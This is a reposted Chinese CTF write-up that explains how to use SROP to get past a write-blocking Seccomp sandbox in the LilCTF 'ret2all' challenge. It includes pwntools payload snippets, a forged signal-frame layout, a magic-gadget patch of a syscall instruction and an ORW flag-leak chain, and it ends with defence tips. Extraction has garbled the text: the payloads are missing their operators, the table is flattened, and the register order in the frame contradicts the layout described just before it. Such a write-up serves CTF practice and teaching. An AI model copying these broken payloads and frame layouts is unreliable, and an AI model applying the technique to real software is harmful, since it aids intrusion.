当Pwn题遇上Seccomp沙箱:手把手教你用SROP绕过LilCTF ret2all的write限制
突破Seccomp沙箱SROP技术在CTF Pwn题中的高阶应用在CTF竞赛中Pwn题目常常会设置各种限制条件来增加挑战难度其中Seccomp沙箱是最常见的防护手段之一。当遇到禁用关键系统调用如write的沙箱环境时传统的ROP链往往难以奏效。本文将深入探讨如何利用SROPSigreturn Oriented Programming这一高阶技术在严格的沙箱限制下实现有效利用。1. Seccomp沙箱与SROP技术基础Seccompsecure computing mode是Linux内核提供的一种安全机制通过限制进程可以执行的系统调用来减少攻击面。在CTF Pwn题中Seccomp常被用来禁用关键系统调用如execve、write等使得传统的ROP利用链失效。SROP是一种特殊的ROP技术它利用了Linux信号处理机制中的sigreturn系统调用。当进程处理完信号后内核会通过sigreturn恢复进程的上下文这个恢复过程是完全信任用户态提供的上下文信息的。攻击者可以伪造信号上下文帧Signal Frame通过控制栈上的数据来完全控制所有寄存器状态。SROP的核心优势单次系统调用即可设置所有寄存器不受传统ROP gadget数量和质量的限制可以绕过部分沙箱限制注意SROP技术要求能够控制栈上的数据和rax寄存器的值设置为15即sigreturn的系统调用号2. 题目分析与利用思路以LilCTF的ret2all题目为例该题目设置了严格的Seccomp规则seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(write), 1, SCMP_A0(SCMP_CMP_NE, 2));这条规则意味着只有当write系统调用的第一个参数文件描述符等于2时才被允许而题目中又执行了close(2)使得常规的write输出变得不可能。突破思路利用read的返回值控制rax寄存器构造SROP帧触发sigreturn通过SROP设置寄存器状态调用dup2(1, 2)重新打开stderr最终实现write(2, buf, len)输出flag3. 关键技术与实战步骤3.1 控制rax寄存器在x86-64架构中系统调用号通过rax寄存器传递。要触发sigreturn需要将rax设置为15。在没有直接控制rax的gadget时可以利用系统调用返回值存储在rax的特性# 通过精确控制read读取的字节数来设置rax payload bA*7 # read将返回7 io.send(payload)3.2 构造SROP帧SROP帧是一个精心构造的数据结构对应内核的sigcontext结构。在64位系统中典型的SROP帧布局如下偏移字段说明0uc_flags必须为08uc通常为016uc_stack栈信息可设为024uc_sigmask信号掩码可设为032uc_mcontext机器上下文开始32r8寄存器r8的值40r9寄存器r9的值.........152rip指令指针160cs/gs/fs段寄存器通常为0x33168fpstate通常为0实战中的SROP帧构造frame [ p64(0), # uc_flags p64(0), # uc p64(0), p64(0), # uc_stack p64(0), # uc_sigmask p64(0)*8, # r8-r15 p64(0), # rdi p64(target_addr), # rsi p64(0x200), # rdx (read长度) p64(0), # rcx p64(0), # rsp p64(0), # rbp p64(0x6edca), # rbx (用于magic gadget) p64(0), # rax (会被覆盖) p64(read2_addr), # rip p64(0x33), # cs/gs/fs p64(0), # fpstate ]3.3 利用magic gadget修改syscall地址在缺乏理想syscall gadget的情况下可以利用程序中存在的特殊gadget来修改内存中的指令add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax] ; ret通过这个gadget可以将现有的syscall指令修改为更理想的syscall; ret序列使得后续利用更加稳定。4. 完整利用链构建完整的利用过程可以分为以下几个阶段初始信息收集获取程序提供的地址信息计算基址栈迁移准备通过控制rbp实现栈迁移绕过检测第一次SROP设置寄存器状态为magic gadget做准备修改syscall指令利用magic gadget优化syscall第二次SROP调用dup2(1, 2)重新打开stderr第三次SROP调用write(2, buf, len)泄露信息ORW利用链最终获取flag关键payload示例# 第一次SROP设置寄存器 io.send(bA*8 p64(0) p64(RBP 0x30) p64(RBP 0x65) p64(0x6edca) p64(0x200) p64(0) p64(0) p64(RBP 0x40) p64(read2) p64(0) p64(0x33) p64(RBP 0x150 1) p64(read) p64(RBP 0x20) p64(leave)) # 触发sigreturn io.send(bA*7 p64(rbp))5. 技术延伸与防御建议SROP技术不仅适用于CTF竞赛在现实漏洞利用中也有应用。防御SROP攻击可以从以下几个方面考虑启用内核保护使用CONFIG_STRICT_SIGRETURN_CHECK内核选项Seccomp增强结合SECCOMP_FILTER_FLAG_TSYNC同步线程规则地址随机化充分使用ASLR增加预测难度栈保护启用Stack Canary和Shadow Stack技术对于CTF选手而言掌握SROP技术意味着拥有了突破严格沙箱限制的有力武器。这项技术要求对Linux信号机制、系统调用约定和寄存器状态有深入理解是Pwn技能树中的重要一环。
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2449165.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!